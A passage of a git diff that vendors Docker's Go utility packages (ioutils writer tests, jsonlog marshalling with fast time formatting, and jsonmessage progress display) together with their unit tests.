wc.Writer.Write(p) + wc.Count += int64(count) + return +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go new file mode 100644 index 0000000000..564b1cd4f5 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/ioutils/writers_test.go @@ -0,0 +1,65 @@ +package ioutils + +import ( + "bytes" + "strings" + "testing" +) + +func TestWriteCloserWrapperClose(t *testing.T) { + called := false + writer := bytes.NewBuffer([]byte{}) + wrapper := NewWriteCloserWrapper(writer, func() error { + called = true + return nil + }) + if err := wrapper.Close(); err != nil { + t.Fatal(err) + } + if !called { + t.Fatalf("writeCloserWrapper should have call the anonymous function.") + } +} + +func TestNopWriteCloser(t *testing.T) { + writer := bytes.NewBuffer([]byte{}) + wrapper := NopWriteCloser(writer) + if err := wrapper.Close(); err != nil { + t.Fatal("NopWriteCloser always return nil on Close.") + } + +} + +func TestNopWriter(t *testing.T) { + nw := &NopWriter{} + l, err := nw.Write([]byte{'c'}) + if err != nil { + t.Fatal(err) + } + if l != 1 { + t.Fatalf("Expected 1 got %d", l) + } +} + +func TestWriteCounter(t *testing.T) { + dummy1 := "This is a dummy string." + dummy2 := "This is another dummy string." + totalLength := int64(len(dummy1) + len(dummy2)) + + reader1 := strings.NewReader(dummy1) + reader2 := strings.NewReader(dummy2) + + var buffer bytes.Buffer + wc := NewWriteCounter(&buffer) + + reader1.WriteTo(wc) + reader2.WriteTo(wc) + + if wc.Count != totalLength { + t.Errorf("Wrong count: %d vs. %d", wc.Count, totalLength) + } + + if buffer.String() != dummy1+dummy2 { + t.Error("Wrong message written") + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go new file mode 100644 index 0000000000..4734c31119 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog.go @@ -0,0 +1,42 @@ +package jsonlog + +import ( + "encoding/json" + "fmt" + "time" +) + +// JSONLog represents a log message, typically a single entry from a given log stream. +// JSONLogs can be easily serialized to and from JSON and support custom formatting. +type JSONLog struct { + // Log is the log message + Log string `json:"log,omitempty"` + // Stream is the log source + Stream string `json:"stream,omitempty"` + // Created is the created timestamp of log + Created time.Time `json:"time"` + // Attrs is the list of extra attributes provided by the user + Attrs map[string]string `json:"attrs,omitempty"` +} + +// Format returns the log formatted according to format +// If format is nil, returns the log message +// If format is json, returns the log marshaled in json format +// By default, returns the log with the log time formatted according to format. +func (jl *JSONLog) Format(format string) (string, error) { + if format == "" { + return jl.Log, nil + } + if format == "json" { + m, err := json.Marshal(jl) + return string(m), err + } + return fmt.Sprintf("%s %s", jl.Created.Format(format), jl.Log), nil +} + +// Reset resets the log to nil. +func (jl *JSONLog) Reset() { + jl.Log = "" + jl.Stream = "" + jl.Created = time.Time{} +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go new file mode 100644 index 0000000000..83ce684a8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling.go @@ -0,0 +1,178 @@ +// This code was initially generated by ffjson +// This code was generated via the following steps: +// $ go get -u github.com/pquerna/ffjson +// $ make BIND_DIR=. shell +// $ ffjson pkg/jsonlog/jsonlog.go +// $ mv pkg/jsonglog/jsonlog_ffjson.go pkg/jsonlog/jsonlog_marshalling.go +// +// It has been modified to improve the performance of time marshalling to JSON +// and to clean it up. +// Should this code need to be regenerated when the JSONLog struct is changed, +// the relevant changes which have been made are: +// import ( +// "bytes" +//- +// "unicode/utf8" +// ) +// +// func (mj *JSONLog) MarshalJSON() ([]byte, error) { +//@@ -20,13 +16,13 @@ func (mj *JSONLog) MarshalJSON() ([]byte, error) { +// } +// return buf.Bytes(), nil +// } +//+ +// func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +//- var err error +//- var obj []byte +//- var first bool = true +//- _ = obj +//- _ = err +//- _ = first +//+ var ( +//+ err error +//+ timestamp string +//+ first bool = true +//+ ) +// buf.WriteString(`{`) +// if len(mj.Log) != 0 { +// if first == true { +//@@ -52,11 +48,11 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +// buf.WriteString(`,`) +// } +// buf.WriteString(`"time":`) +//- obj, err = mj.Created.MarshalJSON() +//+ timestamp, err = FastTimeMarshalJSON(mj.Created) +// if err != nil { +// return err +// } +//- buf.Write(obj) +//+ buf.WriteString(timestamp) +// buf.WriteString(`}`) +// return nil +// } +// @@ -81,9 +81,10 @@ func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { +// if len(mj.Log) != 0 { +// - if first == true { +// - first = false +// - } else { +// - buf.WriteString(`,`) +// - } +// + first = false +// buf.WriteString(`"log":`) +// ffjsonWriteJSONString(buf, mj.Log) +// } + +package jsonlog + +import ( + "bytes" + "unicode/utf8" +) + +// MarshalJSON marshals the JSONLog. +func (mj *JSONLog) MarshalJSON() ([]byte, error) { + var buf bytes.Buffer + buf.Grow(1024) + if err := mj.MarshalJSONBuf(&buf); err != nil { + return nil, err + } + return buf.Bytes(), nil +} + +// MarshalJSONBuf marshals the JSONLog and stores the result to a bytes.Buffer. +func (mj *JSONLog) MarshalJSONBuf(buf *bytes.Buffer) error { + var ( + err error + timestamp string + first = true + ) + buf.WriteString(`{`) + if len(mj.Log) != 0 { + first = false + buf.WriteString(`"log":`) + ffjsonWriteJSONString(buf, mj.Log) + } + if len(mj.Stream) != 0 { + if first { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"stream":`) + ffjsonWriteJSONString(buf, mj.Stream) + } + if !first { + buf.WriteString(`,`) + } + buf.WriteString(`"time":`) + timestamp, err = FastTimeMarshalJSON(mj.Created) + if err != nil { + return err + } + buf.WriteString(timestamp) + buf.WriteString(`}`) + return nil +} + +func ffjsonWriteJSONString(buf *bytes.Buffer, s string) { + const hex = "0123456789abcdef" + + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { + i++ + continue + } + if start < i { + buf.WriteString(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteByte('\\') + buf.WriteByte('n') + case '\r': + buf.WriteByte('\\') + buf.WriteByte('r') + default: + + buf.WriteString(`\u00`) + buf.WriteByte(hex[b>>4]) + buf.WriteByte(hex[b&0xF]) + } + i++ + start = i + continue + } + c, size := utf8.DecodeRuneInString(s[i:]) + if c == utf8.RuneError && size == 1 { + if start < i { + buf.WriteString(s[start:i]) + } + buf.WriteString(`\ufffd`) + i += size + start = i + continue + } + + if c == '\u2028' || c == '\u2029' { + if start < i { + buf.WriteString(s[start:i]) + } + buf.WriteString(`\u202`) + buf.WriteByte(hex[c&0xF]) + i += size + start = i + continue + } + i += size + } + if start < len(s) { + buf.WriteString(s[start:]) + } + buf.WriteByte('"') +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go new file mode 100644 index 0000000000..3edb271410 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlog_marshalling_test.go @@ -0,0 +1,34 @@ +package jsonlog + +import ( + "regexp" + "testing" +) + +func TestJSONLogMarshalJSON(t *testing.T) { + logs := map[*JSONLog]string{ + &JSONLog{Log: `"A log line with \\"`}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line"}: `^{\"log\":\"A log line\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with \r"}: `^{\"log\":\"A log line with \\r\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with & < >"}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: "A log line with utf8 : 🚀 ψ ω β"}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":\".{20,}\"}$`, + &JSONLog{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":\".{20,}\"}$`, + &JSONLog{}: `^{\"time\":\".{20,}\"}$`, + // These ones are a little weird + &JSONLog{Log: "\u2028 \u2029"}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: string([]byte{0xaF})}: `^{\"log\":\"\\ufffd\",\"time\":\".{20,}\"}$`, + &JSONLog{Log: string([]byte{0x7F})}: `^{\"log\":\"\x7f\",\"time\":\".{20,}\"}$`, + } + for jsonLog, expression := range logs { + data, err := jsonLog.MarshalJSON() + if err != nil { + t.Fatal(err) + } + res := string(data) + t.Logf("Result of WriteLog: %q", res) + logRe := regexp.MustCompile(expression) + if !logRe.MatchString(res) { + t.Fatalf("Log line not in expected format [%v]: %q", expression, res) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go new file mode 100644 index 0000000000..df522c0d66 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go @@ -0,0 +1,122 @@ +package jsonlog + +import ( + "bytes" + "encoding/json" + "unicode/utf8" +) + +// JSONLogs is based on JSONLog. +// It allows marshalling JSONLog from Log as []byte +// and an already marshalled Created timestamp. +type JSONLogs struct { + Log []byte `json:"log,omitempty"` + Stream string `json:"stream,omitempty"` + Created string `json:"time"` + + // json-encoded bytes + RawAttrs json.RawMessage `json:"attrs,omitempty"` +} + +// MarshalJSONBuf is based on the same method from JSONLog +// It has been modified to take into account the necessary changes. +func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { + var first = true + + buf.WriteString(`{`) + if len(mj.Log) != 0 { + first = false + buf.WriteString(`"log":`) + ffjsonWriteJSONBytesAsString(buf, mj.Log) + } + if len(mj.Stream) != 0 { + if first == true { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"stream":`) + ffjsonWriteJSONString(buf, mj.Stream) + } + if len(mj.RawAttrs) > 0 { + if first { + first = false + } else { + buf.WriteString(`,`) + } + buf.WriteString(`"attrs":`) + buf.Write(mj.RawAttrs) + } + if !first { + buf.WriteString(`,`) + } + buf.WriteString(`"time":`) + buf.WriteString(mj.Created) + buf.WriteString(`}`) + return nil +} + +// This is based on ffjsonWriteJSONBytesAsString. It has been changed +// to accept a string passed as a slice of bytes. +func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) { + const hex = "0123456789abcdef" + + buf.WriteByte('"') + start := 0 + for i := 0; i < len(s); { + if b := s[i]; b < utf8.RuneSelf { + if 0x20 <= b && b != '\\' && b != '"' && b != '<' && b != '>' && b != '&' { + i++ + continue + } + if start < i { + buf.Write(s[start:i]) + } + switch b { + case '\\', '"': + buf.WriteByte('\\') + buf.WriteByte(b) + case '\n': + buf.WriteByte('\\') + buf.WriteByte('n') + case '\r': + buf.WriteByte('\\') + buf.WriteByte('r') + default: + + buf.WriteString(`\u00`) + buf.WriteByte(hex[b>>4]) + buf.WriteByte(hex[b&0xF]) + } + i++ + start = i + continue + } + c, size := utf8.DecodeRune(s[i:]) + if c == utf8.RuneError && size == 1 { + if start < i { + buf.Write(s[start:i]) + } + buf.WriteString(`\ufffd`) + i += size + start = i + continue + } + + if c == '\u2028' || c == '\u2029' { + if start < i { + buf.Write(s[start:i]) + } + buf.WriteString(`\u202`) + buf.WriteByte(hex[c&0xF]) + i += size + start = i + continue + } + i += size + } + if start < len(s) { + buf.Write(s[start:]) + } + buf.WriteByte('"') +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go new file mode 100644 index 0000000000..6d6ad21583 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes_test.go @@ -0,0 +1,39 @@ +package jsonlog + +import ( + "bytes" + "regexp" + "testing" +) + +func TestJSONLogsMarshalJSONBuf(t *testing.T) { + logs := map[*JSONLogs]string{ + &JSONLogs{Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":}$`, + &JSONLogs{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":}$`, + &JSONLogs{Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":}$`, + &JSONLogs{Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":}$`, + &JSONLogs{Created: "time"}: `^{\"time\":time}$`, + &JSONLogs{}: `^{\"time\":}$`, + // These ones are a little weird + &JSONLogs{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":}$`, + &JSONLogs{Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":}$`, + &JSONLogs{Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":}$`, + // with raw attributes + &JSONLogs{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":}$`, + } + for jsonLog, expression := range logs { + var buf bytes.Buffer + if err := jsonLog.MarshalJSONBuf(&buf); err != nil { + t.Fatal(err) + } + res := buf.String() + t.Logf("Result of WriteLog: %q", res) + logRe := regexp.MustCompile(expression) + if !logRe.MatchString(res) { + t.Fatalf("Log line not in expected format [%v]: %q", expression, res) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go new file mode 100644 index 0000000000..2117338149 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling.go @@ -0,0 +1,27 @@ +// Package jsonlog provides helper functions to parse and print time (time.Time) as JSON. +package jsonlog + +import ( + "errors" + "time" +) + +const ( + // RFC3339NanoFixed is our own version of RFC339Nano because we want one + // that pads the nano seconds part with zeros to ensure + // the timestamps are aligned in the logs. + RFC3339NanoFixed = "2006-01-02T15:04:05.000000000Z07:00" + // JSONFormat is the format used by FastMarshalJSON + JSONFormat = `"` + time.RFC3339Nano + `"` +) + +// FastTimeMarshalJSON avoids one of the extra allocations that +// time.MarshalJSON is making. +func FastTimeMarshalJSON(t time.Time) (string, error) { + if y := t.Year(); y < 0 || y >= 10000 { + // RFC 3339 is clear that years are 4 digits exactly. + // See golang.org/issue/4556#c15 for more discussion. + return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") + } + return t.Format(JSONFormat), nil +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go new file mode 100644 index 0000000000..02d0302c4a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonlog/time_marshalling_test.go @@ -0,0 +1,47 @@ +package jsonlog + +import ( + "testing" + "time" +) + +// Testing to ensure 'year' fields is between 0 and 9999 +func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) { + aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) + json, err := FastTimeMarshalJSON(aTime) + if err == nil { + t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) + } + anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) + json, err = FastTimeMarshalJSON(anotherTime) + if err == nil { + t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json) + } + +} + +func TestFastTimeMarshalJSON(t *testing.T) { + aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) + json, err := FastTimeMarshalJSON(aTime) + if err != nil { + t.Fatal(err) + } + expected := "\"2015-05-29T11:01:02.000000003Z\"" + if json != expected { + t.Fatalf("Expected %v, got %v", expected, json) + } + + location, err := time.LoadLocation("Europe/Paris") + if err != nil { + t.Fatal(err) + } + aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) + json, err = FastTimeMarshalJSON(aTime) + if err != nil { + t.Fatal(err) + } + expected = "\"2015-05-29T11:01:02.000000003+02:00\"" + if json != expected { + t.Fatalf("Expected %v, got %v", expected, json) + } +} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go new file mode 100644 index 0000000000..5481433c56 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go @@ -0,0 +1,225 @@ +package jsonmessage + +import ( + "encoding/json" + "fmt" + "io" + "strings" + "time" + + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/term" + "github.com/docker/go-units" +) + +// JSONError wraps a concrete Code and Message, `Code` is +// is an integer error code, `Message` is the error message. +type JSONError struct { + Code int `json:"code,omitempty"` + Message string `json:"message,omitempty"` +} + +func (e *JSONError) Error() string { + return e.Message +} + +// JSONProgress describes a Progress. terminalFd is the fd of the current terminal, +// Start is the initial value for the operation. Current is the current status and +// value of the progress made towards Total. Total is the end value describing when +// we made 100% progress for an operation. +type JSONProgress struct { + terminalFd uintptr + Current int64 `json:"current,omitempty"` + Total int64 `json:"total,omitempty"` + Start int64 `json:"start,omitempty"` +} + +func (p *JSONProgress) String() string { + var ( + width = 200 + pbBox string + numbersBox string + timeLeftBox string + ) + + ws, err := term.GetWinsize(p.terminalFd) + if err == nil { + width = int(ws.Width) + } + + if p.Current <= 0 && p.Total <= 0 { + return "" + } + current := units.HumanSize(float64(p.Current)) + if p.Total <= 0 { + return fmt.Sprintf("%8v", current) + } + total := units.HumanSize(float64(p.Total)) + percentage := int(float64(p.Current)/float64(p.Total)*100) / 2 + if percentage > 50 { + percentage = 50 + } + if width > 110 { + // this number can't be negative gh#7136 + numSpaces := 0 + if 50-percentage > 0 { + numSpaces = 50 - percentage + } + pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces)) + } + + numbersBox = fmt.Sprintf("%8v/%v", current, total) + + if p.Current > p.Total { + // remove total display if the reported current is wonky. + numbersBox = fmt.Sprintf("%8v", current) + } + + if p.Current > 0 && p.Start > 0 && percentage < 50 { + fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0)) + perEntry := fromStart / time.Duration(p.Current) + left := time.Duration(p.Total-p.Current) * perEntry + left = (left / time.Second) * time.Second + + if width > 50 { + timeLeftBox = " " + left.String() + } + } + return pbBox + numbersBox + timeLeftBox +} + +// JSONMessage defines a message struct. It describes +// the created time, where it from, status, ID of the +// message. It's used for docker events. +type JSONMessage struct { + Stream string `json:"stream,omitempty"` + Status string `json:"status,omitempty"` + Progress *JSONProgress `json:"progressDetail,omitempty"` + ProgressMessage string `json:"progress,omitempty"` //deprecated + ID string `json:"id,omitempty"` + From string `json:"from,omitempty"` + Time int64 `json:"time,omitempty"` + TimeNano int64 `json:"timeNano,omitempty"` + Error *JSONError `json:"errorDetail,omitempty"` + ErrorMessage string `json:"error,omitempty"` //deprecated + // Aux contains out-of-band data, such as digests for push signing. + Aux *json.RawMessage `json:"aux,omitempty"` +} + +// Display displays the JSONMessage to `out`. `isTerminal` describes if `out` +// is a terminal. If this is the case, it will erase the entire current line +// when displaying the progressbar. +func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error { + if jm.Error != nil { + if jm.Error.Code == 401 { + return fmt.Errorf("Authentication is required.") + } + return jm.Error + } + var endl string + if isTerminal && jm.Stream == "" && jm.Progress != nil { + // [2K = erase entire current line + fmt.Fprintf(out, "%c[2K\r", 27) + endl = "\r" + } else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal + return nil + } + if jm.TimeNano != 0 { + fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed)) + } else if jm.Time != 0 { + fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed)) + } + if jm.ID != "" { + fmt.Fprintf(out, "%s: ", jm.ID) + } + if jm.From != "" { + fmt.Fprintf(out, "(from %s) ", jm.From) + } + if jm.Progress != nil && isTerminal { + fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl) + } else if jm.ProgressMessage != "" { //deprecated + fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl) + } else if jm.Stream != "" { + fmt.Fprintf(out, "%s%s", jm.Stream, endl) + } else { + fmt.Fprintf(out, "%s%s\n", jm.Status, endl) + } + return nil +} + +// DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal` +// describes if `out` is a terminal. If this is the case, it will print `\n` at the end of +// each line and move the cursor while displaying. +func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error { + var ( + dec = json.NewDecoder(in) + ids = make(map[string]int) + ) + for { + diff := 0 + var jm JSONMessage + if err := dec.Decode(&jm); err != nil { + if err == io.EOF { + break + } + return err + } + + if jm.Aux != nil { + if auxCallback != nil { + auxCallback(jm.Aux) + } + continue + } + + if jm.Progress != nil { + jm.Progress.terminalFd = terminalFd + } + if jm.ID != "" && (jm.Progress != nil || jm.ProgressMessage != "") { + line, ok := ids[jm.ID] + if !ok { + // NOTE: This approach of using len(id) to + // figure out the number of lines of history + // only works as long as we clear the history + // when we output something that's not + // accounted for in the map, such as a line + // with no ID. + line = len(ids) + ids[jm.ID] = line + if isTerminal { + fmt.Fprintf(out, "\n") + } + } + diff = len(ids) - line + if isTerminal && diff > 0 { + fmt.Fprintf(out, "%c[%dA", 27, diff) + } + } else { + // When outputting something that isn't progress + // output, clear the history of previous lines. We + // don't want progress entries from some previous + // operation to be updated (for example, pull -a + // with multiple tags). + ids = make(map[string]int) + } + err := jm.Display(out, isTerminal) + if jm.ID != "" && isTerminal && diff > 0 { + fmt.Fprintf(out, "%c[%dB", 27, diff) + } + if err != nil { + return err + } + } + return nil +} + +type stream interface { + io.Writer + FD() uintptr + IsTerminal() bool +} + +// DisplayJSONMessagesToStream prints json messages to the output stream +func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error { + return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback) +} diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go new file mode 100644 index 0000000000..c6c5b0ed2a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go @@ -0,0 +1,245 @@ +package jsonmessage + +import ( + "bytes" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/pkg/term" +) + +func TestError(t *testing.T) { + je := JSONError{404, "Not found"} + if je.Error() != "Not found" { + t.Fatalf("Expected 'Not found' got '%s'", je.Error()) + } +} + +func TestProgress(t *testing.T) { + termsz, err := term.GetWinsize(0) + if err != nil { + // we can safely ignore the err here + termsz = nil + } + jp := JSONProgress{} + if jp.String() != "" { + t.Fatalf("Expected empty string, got '%s'", jp.String()) + } + + expected := " 1 B" + jp2 := JSONProgress{Current: 1} + if jp2.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp2.String()) + } + + expectedStart := "[==========> ] 20 B/100 B" + if termsz != nil && termsz.Width <= 110 { + expectedStart = " 20 B/100 B" + } + jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()} + // Just look at the start of the string + // (the remaining time is really hard to test -_-) + if jp3.String()[:len(expectedStart)] != expectedStart { + t.Fatalf("Expected to start with %q, got %q", expectedStart, jp3.String()) + } + + expected = "[=========================> ] 50 B/100 B" + if termsz != nil && termsz.Width <= 110 { + expected = " 50 B/100 B" + } + jp4 := JSONProgress{Current: 50, Total: 100} + if jp4.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp4.String()) + } + + // this number can't be negative gh#7136 + expected = "[==================================================>] 50 B" + if termsz != nil && termsz.Width <= 110 { + expected = " 50 B" + } + jp5 := JSONProgress{Current: 50, Total: 40} + if jp5.String() != expected { + t.Fatalf("Expected %q, got %q", expected, jp5.String()) + } +} + +func TestJSONMessageDisplay(t *testing.T) { + now := time.Now() + messages := map[JSONMessage][]string{ + // Empty + JSONMessage{}: {"\n", "\n"}, + // Status + JSONMessage{ + Status: "status", + }: { + "status\n", + "status\n", + }, + // General + JSONMessage{ + Time: now.Unix(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)), + }, + // General, with nano precision time + JSONMessage{ + TimeNano: now.UnixNano(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + }, + // General, with both times Nano is preferred + JSONMessage{ + Time: now.Unix(), + TimeNano: now.UnixNano(), + ID: "ID", + From: "From", + Status: "status", + }: { + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)), + }, + // Stream over status + JSONMessage{ + Status: "status", + Stream: "stream", + }: { + "stream", + "stream", + }, + // With progress message + JSONMessage{ + Status: "status", + ProgressMessage: "progressMessage", + }: { + "status progressMessage", + "status progressMessage", + }, + // With progress, stream empty + JSONMessage{ + Status: "status", + Stream: "", + Progress: &JSONProgress{Current: 1}, + }: { + "", + fmt.Sprintf("%c[2K\rstatus 1 B\r", 27), + }, + } + + // The tests :) + for jsonMessage, expectedMessages := range messages { + // Without terminal + data := bytes.NewBuffer([]byte{}) + if err := jsonMessage.Display(data, false); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[0] { + t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String()) + } + // With terminal + data = bytes.NewBuffer([]byte{}) + if err := jsonMessage.Display(data, true); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[1] { + t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String()) + } + } +} + +// Test JSONMessage with an Error. It will return an error with the text as error, not the meaning of the HTTP code. +func TestJSONMessageDisplayWithJSONError(t *testing.T) { + data := bytes.NewBuffer([]byte{}) + jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}} + + err := jsonMessage.Display(data, true) + if err == nil || err.Error() != "Can't find it" { + t.Fatalf("Expected a JSONError 404, got [%v]", err) + } + + jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}} + err = jsonMessage.Display(data, true) + if err == nil || err.Error() != "Authentication is required." { + t.Fatalf("Expected an error [Authentication is required.], got [%v]", err) + } +} + +func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) { + var ( + inFd uintptr + ) + data := bytes.NewBuffer([]byte{}) + reader := strings.NewReader("This is not a 'valid' JSON []") + inFd, _ = term.GetFdInfo(reader) + + if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" { + t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err) + } +} + +func TestDisplayJSONMessagesStream(t *testing.T) { + var ( + inFd uintptr + ) + + messages := map[string][]string{ + // empty string + "": { + "", + ""}, + // Without progress & ID + "{ \"status\": \"status\" }": { + "status\n", + "status\n", + }, + // Without progress, with ID + "{ \"id\": \"ID\",\"status\": \"status\" }": { + "ID: status\n", + fmt.Sprintf("ID: status\n"), + }, + // With progress + "{ \"id\": \"ID\", \"status\": \"status\", \"progress\": \"ProgressMessage\" }": { + "ID: status ProgressMessage", + fmt.Sprintf("\n%c[%dAID: status ProgressMessage%c[%dB", 27, 1, 27, 1), + }, + // With progressDetail + "{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": { + "", // progressbar is disabled in non-terminal + fmt.Sprintf("\n%c[%dA%c[2K\rID: status 1 B\r%c[%dB", 27, 1, 27, 27, 1), + }, + } + for jsonMessage, expectedMessages := range messages { + data := bytes.NewBuffer([]byte{}) + reader := strings.NewReader(jsonMessage) + inFd, _ = term.GetFdInfo(reader) + + // Without terminal + if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[0] { + t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String()) + } + + // With terminal + data = bytes.NewBuffer([]byte{}) + reader = strings.NewReader(jsonMessage) + if err := DisplayJSONMessagesStream(reader, data, inFd, true, nil); err != nil { + t.Fatal(err) + } + if data.String() != expectedMessages[1] { + t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String()) + } + } + +} diff --git 